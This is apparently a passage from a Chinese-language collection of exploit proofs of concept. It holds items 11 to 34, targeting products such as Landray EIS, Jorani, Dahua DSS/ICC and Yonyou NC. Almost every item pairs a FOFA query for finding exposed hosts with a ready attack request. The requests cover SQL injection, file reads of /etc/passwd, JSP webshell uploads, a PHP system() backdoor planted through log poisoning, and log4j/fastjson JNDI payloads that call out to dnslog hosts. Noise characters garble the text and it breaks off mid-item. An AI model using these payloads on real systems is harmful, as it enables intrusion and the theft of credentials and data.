" U5 Q/ Y. B; W$ |. J" E5 u) U# ]Content-Disposition: form-data; name="file"filename="icfitnya.txt": Y6 I4 u# t7 a1 L( g/ Y" D* d
Content-Type: text/html
, i- W" r% ?3 d4 r. G/ ^2 x
1 i0 H: y, C1 T0 ujmnqjfdsupxgfidopeixbgsxbf
  W  B- p; D: u------WebKitFormBoundaryxdgaqmqu--
8 v0 s# [7 s# |* {2 A
7 T# }9 j' n: ^( H! @1 D* {4 k' I5 i, S7 `$ }
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
" n2 E$ w) G- y; ?2 e0 cFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"5 Z5 [+ ]8 h; l! S$ q" e; ]
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.11 R. T0 ]: s2 q- @3 S3 z, _
Host: 127.0.0.1% v0 o) y2 \& U4 w2 a
Pragma: no-cache
6 W! ]4 V1 w- G# PCache-Control: no-cache
) y1 i  ^& J2 z& t' |, [% _Upgrade-Insecure-Requests: 1
: Y5 |3 p4 t( F3 }/ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( m+ U; v$ `6 P0 o( Q0 Y4 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% o* w! T5 M$ V3 N  s, D; VAccept-Encoding: gzip, deflate
4 `3 O' {6 c( n9 S4 B; o/ lAccept-Language: zh-CN,zh;q=0.9,en;q=0.8+ N! {1 U# |! V4 ?. L
Connection: close
( t# \1 L+ }: \
) t7 c9 c% T( ]6 ^4 M, b  e/ u: m/ v* O9 G
12. Jorani < 1.0.2 远程命令执行5 N6 f/ ?( [3 o7 g/ D& l# B# k
FOFA:title="Jorani"
1 G2 C, W! }  r$ w6 l8 Y8 `, w0 I第一步先拿到cookie) C6 K$ ?% |  r# u) \; r9 R
GET /session/login HTTP/1.1
8 T) c* ]6 ?( M( m# j: xHost: 192.168.190.309 l- q, H. I% }  ~1 l7 a
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36/ O! X" `* f6 p! b6 t3 f5 A
Connection: close/ W- G. S* K6 A* [. m; i
Accept-Encoding: gzip
- n. l! I( g$ v: j5 s
) R  w2 |  i. z/ r/ ~6 E( Q' A2 Z0 O2 d5 L% B) ~' g4 r
响应中csrf_cookie_jorani用于后续请求
% }5 ]3 ^' |3 H8 P/ THTTP/1.1 200 OK7 B0 r- M% D" J5 A
Connection: close" y+ t3 _4 I9 U$ f/ }0 L8 {
Cache-Control: no-store, no-cache, must-revalidate
: b9 k$ d) v0 ^" S# ]. K, rContent-Type: text/html; charset=UTF-81 G7 J- R" ]6 w' b# K& E3 A$ \
Date: Tue, 24 Oct 2023 09:34:28 GMT! X* i' G$ B  T, U3 N  i6 I7 [
Expires: Thu, 19 Nov 1981 08:52:00 GMT
& h# k4 T. m6 K# `! Q1 H2 QLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT0 b2 T- A  N8 n5 S3 s: S
Pragma: no-cache
2 j' A7 f4 m4 ^8 yServer: Apache/2.4.54 (Debian)
& B+ d. o8 F0 x; N, \Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
/ [( ]4 N6 K! X; ISet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly  K- n. V$ X+ b% @+ ~8 I
Vary: Accept-Encoding4 g" i3 a/ y3 h; d# e; e
8 V  p( W# J7 t2 V# |& @
( `2 M3 \2 A2 i; Q9 k7 O
POST请求,执行函数并进行base64编码
# c' E9 A  j! u8 E! DPOST /session/login HTTP/1.1
1 p& m* y" M- g7 |# ?Host: 192.168.190.30
, G% @6 T9 L4 ]* B- BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
7 p+ A) a% u- L9 [# _Connection: close6 `) L* u* v& a' ~# s, b* m! C
Content-Length: 252+ S8 o0 e  A" k6 Y2 E  v" t) U
Content-Type: application/x-www-form-urlencoded/ ?/ Z  n( S5 \- W5 F
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r* t9 [4 g9 k" l9 I3 S" m* T" U
Accept-Encoding: gzip7 w, H& P5 d8 i0 N
5 l% ?. s% i0 k! U" T
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
- t, C( z# z& B  K; Z
  z; Y6 q5 w" O. h2 \& s" ?3 n9 g1 j3 q; |$ }* G

) ~8 [* y% l. r1 H7 @% s* q向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
4 n. E  @4 x& W. G8 ?GET /pages/view/log-2023-10-24 HTTP/1.1
* b7 x! {8 U) V% D! rHost: 192.168.190.30
; f) |/ E+ U9 v( X: V& {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. Y5 f- |$ F1 `; U. o! gConnection: close* _+ @' I$ f9 F- j( \+ l4 D
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
6 G9 ~$ {0 t( E" t' E! X1 @K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=2 P$ W6 q9 |! a  @: G
X-REQUESTED-WITH: XMLHttpRequest
8 s3 w" \9 a2 ~Accept-Encoding: gzip1 a- F& k3 h6 ?; m, b
9 E6 V  ^8 f, V5 r: }

  k( X) v8 J4 S13. 红帆iOffice ioFileDown任意文件读取
! Y5 _  C4 K5 \FOFA:app="红帆-ioffice"- J3 d; m7 g5 H+ e- J
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1& i4 C( _# V+ H& \1 d: [4 Q
Host: x.x.x.x
  |% W6 u$ D2 g* c, K6 VUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
( p4 G* T2 M) c) t& \" P/ ~Connection: close% @, x* R( k2 |1 H  p& X
Accept: */*
! ^7 L4 `) o$ C8 z% W" DAccept-Encoding: gzip
+ i: \- r  ?1 D) _; \  j
" ~. I9 t- K3 J: M: _
" P& u- g" {+ c5 w0 J14. 华夏ERP(jshERP)敏感信息泄露
0 d' T  P! Q5 f( f7 [FOFA:body="jshERP-boot", B  ^  t" `# X$ l; i" K
泄露内容包括用户名密码
7 a/ t  }  A3 lGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
2 N1 u, l0 G; ?( D3 zHost: x.x.x.x
% u! ^  F! Y% B9 j0 k7 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
, S( t1 l. Y7 u, c2 A: FConnection: close
! m- K0 t# S3 W% {) RAccept: */*
; f, c% L' c4 U9 B1 l. pAccept-Language: en, u. S' m) \9 b6 w
Accept-Encoding: gzip
- c4 R4 X$ ~$ N. o8 H3 _* L0 I7 G7 j1 r# D5 }
: ^, h/ M, P6 Y1 Y' ~
15. 华夏ERP getAllList信息泄露
* |% H5 S3 z1 @/ k3 |% I5 y% NCVE-2024-0490
# U7 }. T4 \% j$ R0 c+ }# @FOFA:body="jshERP-boot"
% B- t* s6 S# i5 ^! S& F# @2 j: E泄露内容包括用户名密码. D2 t# x# N  Z0 O% Q
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
- I! z" A' k3 ?: E9 Z2 C# u* P. xHost: 192.168.40.130:100+ N8 k2 F- M- c: \7 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
# f; V  _5 N6 ^Connection: close8 y; R" R2 K9 E: f7 o
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8+ q& k7 ~* W, R; ^  [" T- d1 s- N' n
Accept-Language: en
+ R2 l, i0 a/ l/ J8 a7 {& X# qsec-ch-ua-platform: Windows
( D8 t% {0 n; I0 t6 AAccept-Encoding: gzip  Z4 }8 a7 F1 [0 @& L8 {

$ e9 T5 O9 o. z% E
: M( ]+ L; {7 H  Z  T! S16.  红帆HFOffice医微云SQL注入
( o& u) s" T( p' GFOFA:title="HFOffice"& x: y' V+ A9 H) g8 v) Y% `+ D
poc中调用函数计算1234的md5值
9 a" F5 m6 b3 B  bGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
/ M4 L; O8 F( Y, m# zHost: x.x.x.x
' y9 y+ e# l3 Z3 cUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36( }8 }. {5 r$ j. l  c7 [4 T  R
Connection: close
4 c  D! F+ ?6 x0 m0 s4 pAccept: */*; y4 s. Z' ^0 @
Accept-Language: en
+ v3 R8 l$ i6 dAccept-Encoding: gzip
) B' h/ r5 W6 o7 O/ Y% j' R3 p( n% t9 D7 g1 e  W
& ]2 A" M  a; o% K0 @' j2 y
17. 大华 DSS itcBulletin SQL 注入9 n- @5 _8 L7 D! z
FOFA:app="dahua-DSS"" p4 g  \9 }0 z3 k+ }$ Q
POST /portal/services/itcBulletin?wsdl HTTP/1.1* N0 I1 I- R, v! q/ h7 o4 W( X
Host: x.x.x.x" b. ]9 Z! r6 }$ o: ]+ o3 C* t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ M& G" i4 J7 H" zConnection: close
5 `- ?, b9 v) R4 t3 }Content-Length: 345
0 X1 ?1 Y( M5 U! dAccept-Encoding: gzip
& [% E! D1 u. B# I+ M9 j6 c
7 ]4 Z' R% |! @# `* u<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>: a# S( |: _: _! \  F
<s11:Body>
# ~* r3 R- C- F% Y* r7 N! [3 ^    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
) H* ]6 J% H2 V1 t1 x* s/ N- e% N9 p$ p      <netMarkings>
) b( ^0 W; \$ N4 y! O- `' G       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
8 L# M. ~8 Z: `- B6 W. z% }      </netMarkings>" O2 }$ J  x& D5 ]8 V* h
    </ns1:deleteBulletin>
) d1 a  v7 r5 ~  </s11:Body>& g% P: v: f: f4 t
</s11:Envelope>( r# ~6 Q8 V  d8 ~, K
$ E7 m0 i6 Z9 N9 g) O1 i7 Q

8 t! k" ]5 |) }2 d7 e18. 大华 DSS 数字监控系统 user_edit.action 信息泄露2 t! m0 T6 d. v: g% @: y+ a
FOFA:app="dahua-DSS"
* C. d$ @1 D& ?' K/ I% ]2 [  vGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
) n, c2 s) O; M( s. pHost: your-ip
8 E# Q; z! V2 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! b+ {4 G0 i# L) ]( D6 C$ o' lAccept-Encoding: gzip, deflate. P. S$ |4 w: z# d  g$ t
Accept: */*% t1 b5 D1 ]2 O$ h, a1 O3 ~! j; ]
Connection: keep-alive
: L0 j3 q  S: d+ p9 B
$ I3 T# `2 w+ D+ s: d! \4 e3 Z0 m  {- c; Z% b! j: z3 E/ z
" V* `, {' `1 q$ N6 E. ?
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入  N8 |, U8 d  Q( _, N9 U$ x0 P
FOFA:app="dahua-DSS"
; g( O: h5 L" f" L. DGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.10 j" A& _8 E% ]* D& W' j
Host:
) V/ l! g7 s7 C) k" HUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! @! F6 W! [0 x% ~/ Z
Accept-Encoding: gzip, deflate
2 Q( M: ~& G; \5 w! w! m" OAccept: */*# C" t) S; G4 e
Connection: keep-alive
7 d; c' m5 Q7 l% F0 i+ a. x* t
. p- s: a' n; c$ y' u. W: ?4 u2 r$ F" u* ?% l: p0 S
20. 大华ICC智能物联综合管理平台任意文件读取
; Y+ g5 ^5 y4 Z$ y/ [/ UFOFA:body="*客户端会小于800*"
3 u% G! [9 E: B7 @& sGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
. ?; S8 b9 c; ^. Z' ~' ~Host: x.x.x.x% h8 E6 m- h# o3 a4 y
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 ?+ Z8 b4 N4 I3 X$ D: }- w- dConnection: close3 H) p( `3 Y4 Y6 h
Accept: */*1 y* o7 X' a$ O! K4 h
Accept-Language: en$ f2 H9 q# j/ V9 o
Accept-Encoding: gzip
9 t0 e6 H% s/ t) p9 f& |' G2 p
  `' e# }* d3 `8 [# S% B2 t, \8 ?
21. 大华ICC智能物联综合管理平台random远程代码执行! f) ]% X( J0 J5 @2 q6 ~! Z
FOFA:icon_hash="-1935899595"
. P1 e% |5 j6 _6 E$ F' @: ePOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
& J) t9 ?2 s: Y+ B0 _Host: x.x.x.x
; ]- n9 W+ C: g8 r8 R4 ^0 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& v6 o9 h, u' O( s, {3 G
Content-Length: 161
! V" ~# ]: @2 M/ A3 v4 e: uAccept-Encoding: gzip  @. p/ P7 F' b  O' d) H: V, O
Connection: close2 P2 T+ ^$ X* d, A/ M9 w! T7 S
Content-Type: application/json;charset=utf-8/ @7 P6 D' J4 h+ ^- u9 \
' g4 f8 a  }% o: e3 ?, {/ {& G
{
0 D9 S2 w' T* U8 b"a":{- X, w2 V+ u' Y8 ]  K3 R
   "@type":"com.alibaba.fastjson.JSONObject",
# E; ~0 o1 q' K1 C4 b    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
+ [0 J$ _2 [# y- f3 }  }""; L, I1 U) U5 D  n6 t' H- B1 N
}
* |) A0 y0 Q; H) x( J. x: g0 a" ?3 ~1 K

( R' V8 H' P; V7 X, r22. 大华ICC智能物联综合管理平台 log4j远程代码执行( L6 E2 B* q7 K
FOFA:icon_hash="-1935899595"# Z% k; [; e! S$ o# s" f0 K
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.11 I1 v2 j  E6 L! e+ s; P: l7 g5 m
Host: your-ip$ {/ o/ E" k' z" l9 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 p: n. p/ i4 C: c
Content-Type: application/json;charset=utf-8
5 m1 O( J, _: g, {2 \$ m3 p  ?% a) D- S3 b# ~9 \9 {0 E
{
$ K/ Z4 ?# S7 V8 K4 W+ N4 y8 {  i"loginName":"${jndi:ldap://dnslog}"
1 ]1 W# z! u6 B6 \  S}/ m2 \# \3 U6 R' y2 J8 t
5 o9 f- a0 z' v% A
/ a6 y* Z' W+ G3 t) ?- {
0 M3 a, V/ C/ z9 }& r) _6 M* b
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行. K; S! Y$ a$ K9 K  A
FOFA:icon_hash="-1935899595". R) Y7 {" q; T' R' g
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
4 S, c+ J( {# ~: }4 U7 PHost: your-ip- c. z8 Q, p8 w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 l5 _5 t1 E' y! MContent-Type: application/json;charset=utf-8
" b3 B3 [- R3 w3 zAccept-Encoding: gzip
: c6 M' z# \4 PConnection: close
0 g; }. [$ T, C1 x. v! [
0 Y3 p5 t8 ]3 j& {) _( x) O{
' F3 r8 j! c  Z% l5 R5 o$ ~; M7 L    "a":{7 L4 K, u0 \8 E# Q, d8 l
        "@type":"com.alibaba.fastjson.JSONObject",' \0 }/ |7 M( F: |5 I7 K
       {"@type":"java.net.URL","val":"http://DNSLOG"}( Q9 D& m, d: k* X6 a
        }""! F; m1 A5 I' a1 e* ?& r( r- D
}. E% i2 N; z9 Z$ @& Y( Y, L
* o7 Z/ S2 I; n( F

) b" g& G- f8 ?9 R24. 用友NC 6.5 accept.jsp任意文件上传1 V3 {. X( e* \5 P+ |
FOFA:icon_hash="1085941792"
- T. Z2 A3 J3 J8 a2 s$ ^5 U/ uPOST /aim/equipmap/accept.jsp HTTP/1.1. O" S+ P1 ?# ^( K1 Z6 E2 ~
Host: x.x.x.x+ n, v9 [9 G$ ]
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
6 ]7 R+ n' [  W: s3 s+ tConnection: close7 a- T" U+ S& c! L$ N; j
Content-Length: 449% H* r) Z' O; A$ t
Accept: */*
0 z! N: F- S# |$ L& w2 A& UAccept-Encoding: gzip) ?+ c% U8 |- M9 b
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc$ r0 |2 t' C+ z. o2 S

6 \7 O/ o, p( Y8 j6 X-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
( A- v) k" h; l" E) j; zContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"6 F( l' Z0 D3 T4 `
Content-Type: text/plain
8 @$ Z: l5 v# s; y% s9 Z2 o( R2 U9 |% b  L) l& f# _+ Q
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
6 D( I) n- s# w& Q-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
6 c1 R" K2 {, m, LContent-Disposition: form-data; name="fname"( k, ^" D" {" A* H9 U1 Q

$ l! ?; H4 I) G9 x7 F+ h\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
- J2 l3 C" I$ A. M2 p8 v4 R-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
2 Z. \/ V6 w$ c. g7 F) Z5 o" G( V/ s% z7 t% w  M1 s% o( d0 }% i
) G7 P+ ]- n. K/ G: i- `8 @
25. 用友NC registerServlet JNDI 远程代码执行
( y6 F# e! }1 X6 oFOFA:app="用友-UFIDA-NC"3 _. p7 y4 y, U) [) y4 T! A
POST /portal/registerServlet HTTP/1.1
3 [$ T) C; }9 k9 H9 J$ _6 cHost: your-ip0 w2 O5 }, A7 y% b4 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.05 c8 ]% u" \* X3 s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9' t( ]; {0 p  O9 d* |! r' h2 @7 k/ n
Accept-Encoding: gzip, deflate, W- O3 Y& ^! S/ `# ?- o/ A6 q
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
  o/ Z9 m2 D, S* k6 G1 J+ PContent-Type: application/x-www-form-urlencoded
& S9 ~: c7 g1 T! R0 ]- V3 q0 T' N3 [
type=1&dsname=ldap://dnslog
. \$ S0 B: z1 c9 J5 h3 T2 |
: z- I' N- P$ J, \2 e5 Q
( N1 ]9 z1 T* N9 y# N+ `$ @0 G+ C
  z% l: S2 s" J, L: o26. 用友NC linkVoucher SQL注入7 \  k( g" G% F7 b) P
FOFA:app="用友-UFIDA-NC"
2 N9 ]# C: J. _GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- B9 j+ ]) H/ r: H" l  MHost: your-ip
! i- q: G8 m) w0 ^4 I; ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# G: m7 {* m  a4 Z
Content-Type: application/x-www-form-urlencoded
* l. x6 B* y1 Q3 x+ d4 F" K# _Accept-Encoding: gzip, deflate9 @4 Y0 X( t. `- B  E- e; u. Y
Accept: */*
7 x3 g: @& @# Z" ^# [7 eConnection: keep-alive8 k! s! G6 |2 d

& z8 B0 ~6 J  k& ]
7 C6 {  a) k6 ]- Y1 k27. 用友 NC showcontent SQL注入
) l) @/ S0 J9 l- V7 T0 J* KFOFA:icon_hash="1085941792"( P+ G! E) n' j; d5 C
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1& A8 e. U- V; u; p, B: n( B; i1 j8 ~
Host: your-ip6 E) @1 Z  I6 g/ R% t' ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% O! B: v7 ^9 k
Accept-Encoding: identity, n& H) o  {' e2 N6 w. i# b
Connection: close
, j3 h7 N/ [3 g* ~Content-Type: text/xml; charset=utf-8
. y; E1 j* t2 }
7 F$ H( `! k8 E1 o% i* ~
) _' R# O4 i7 b28. 用友NC grouptemplet 任意文件上传/ ]3 v2 e  v) \& X, o
FOFA:icon_hash="1085941792"6 n( @; W+ q/ c
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
& D7 X9 Y& y1 F# G& k* IHost: x.x.x.x  C2 ]  C/ N, m5 T3 J3 g& ?: r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
: P8 {% P6 o& T" Q5 ?; W" \Connection: close/ P; V+ M* o9 S7 B2 [
Content-Length: 2684 F; y, r) f& w: ]1 C  H
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
8 K  [9 s- r. _4 ]  G! gAccept-Encoding: gzip+ x' L; U6 Z& ]3 H8 g

6 h, m5 P/ E6 n/ ]# V: p------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk, F7 w$ N9 v% R
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
  i# Z+ g; u4 C- _8 ]0 dContent-Type: application/octet-stream
3 v7 z3 F. F7 k0 ]0 i! M! S  T+ }, C+ a- j$ H8 h
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>9 u6 W4 y/ b1 C- E# z8 h3 @
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--/ E1 `/ G1 }3 W% Q3 ?& R+ `

$ a# e5 K9 u. |2 P
: v  X; g) o4 P1 K* P( J5 e/uapim/static/pages/nc/head.jsp4 N; J) }- ~$ R& g( U& n3 x" }
) n, x7 G+ _3 ~8 F0 p" R/ E  \
29. 用友NC down/bill SQL注入
( ^# v- W9 {1 S( G7 lFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"$ y6 g  [: E" Z& T0 p
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
' W/ [7 r% }1 G, S+ J+ b, `Host: your-ip. A: B$ ]  O" x# Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- q. N7 [( d2 U4 m4 ^+ s6 O8 G$ G5 IContent-Type: application/x-www-form-urlencoded
. ?; h5 f* E, @# f; eAccept-Encoding: gzip, deflate
. j) E: ]( i8 O9 ~, K" iAccept: */*
0 S. y. ^5 P8 O7 T0 ZConnection: keep-alive
7 b. @8 i& ~' R$ M* \: {# v6 p7 Y2 g
* b9 v( t  ^9 @+ y& l% u7 P' h+ v8 C/ g; S- y
30. 用友NC importPml SQL注入0 L+ |7 G6 i; }7 w4 O% _0 ^+ G6 h5 J6 y
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"& Y0 `  m+ w8 d. _7 U* b9 Y
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
2 G8 r, p' v# }" b3 T) hHost: your-ip( B1 ]9 J" u* K! [" `' I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V5 d, W5 E8 t6 z  a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.365 g5 s" C- _3 p& Q7 i+ R
Connection: close/ Y$ c+ O; |2 e3 q
5 w, `  [6 `  m7 {; r
------WebKitFormBoundaryH970hbttBhoCyj9V' k& u3 B7 s( l% a9 Q/ r
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
3 }) E, I. O! H  cContent-Type: image/jpeg; B0 v2 }/ {5 g2 V
------WebKitFormBoundaryH970hbttBhoCyj9V--% ]! m# m$ K" b; W3 O
6 S: h. N+ i/ _

. a! m3 S# G+ V; a31. 用友NC runStateServlet SQL注入
2 L3 d. r. I2 [+ wversion<=6.5
7 y8 `8 |2 v9 p9 O, xFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif": q7 s$ V- Z: R0 L& c. C( _7 M! h
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1! q4 ?. H' E" {0 B, U
Host: host
$ v, }" X7 Y7 g/ ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
& f7 e  U1 v' M- UContent-Type: application/x-www-form-urlencoded7 G" X4 t$ ]( g! r: ?
7 B5 @) h3 d9 |, z2 B9 t" R) G" K7 G

( [  h2 C' E- X32. 用友NC complainbilldetail SQL注入
& N9 h8 w- ?  E4 G: ?version= NC633、NC65
* N& I8 f: F# h* [FOFA:app="用友-UFIDA-NC"
! y. z4 d( V" e. vGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1. t. _$ c& c5 G6 ?3 x
Host: your-ip
& z5 R% r+ `  q% b* O; {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! I/ _- V1 Y+ C% c) n+ D
Content-Type: application/x-www-form-urlencoded
9 p5 N/ V& h) ^% y3 p( P9 e- HAccept-Encoding: gzip, deflate
; Z, D( ^: C; UAccept: */*6 F" T! G% U/ S2 ~
Connection: keep-alive
+ |* M# [4 R5 X) r0 W( Y% V; ^# }- z' `

7 R/ f0 m/ d; H3 B2 N2 s33. 用友NC downTax/download SQL注入% z( i! w4 S, m- t' U& C
version:NC6.5FOFA:app="用友-UFIDA-NC"+ q* v: \/ ]7 v; j0 Y8 A/ c
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 t8 l; _# l! |Host: your-ip' c; B( n- `5 r/ T* F$ s$ S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  r  P2 p) t! l7 T; s( tContent-Type: application/x-www-form-urlencoded! ?% ~- H$ f& m2 |' _) [
Accept-Encoding: gzip, deflate+ e5 ?6 j6 r5 d  \$ }: U+ j
Accept: */*
2 q3 F1 q' P. h7 `1 U  OConnection: keep-alive
& G: F$ v' o# ?' \8 D: ^
; J9 `, h9 l) Q' X  N
% K, y  Q" R  E/ B- g, E34. 用友NC warningDetailInfo接口SQL注入
7 r% G0 x# M+ Z* D7 C2 {3 eFOFA:app="用友-UFIDA-NC"8 q; t( a" H$ q
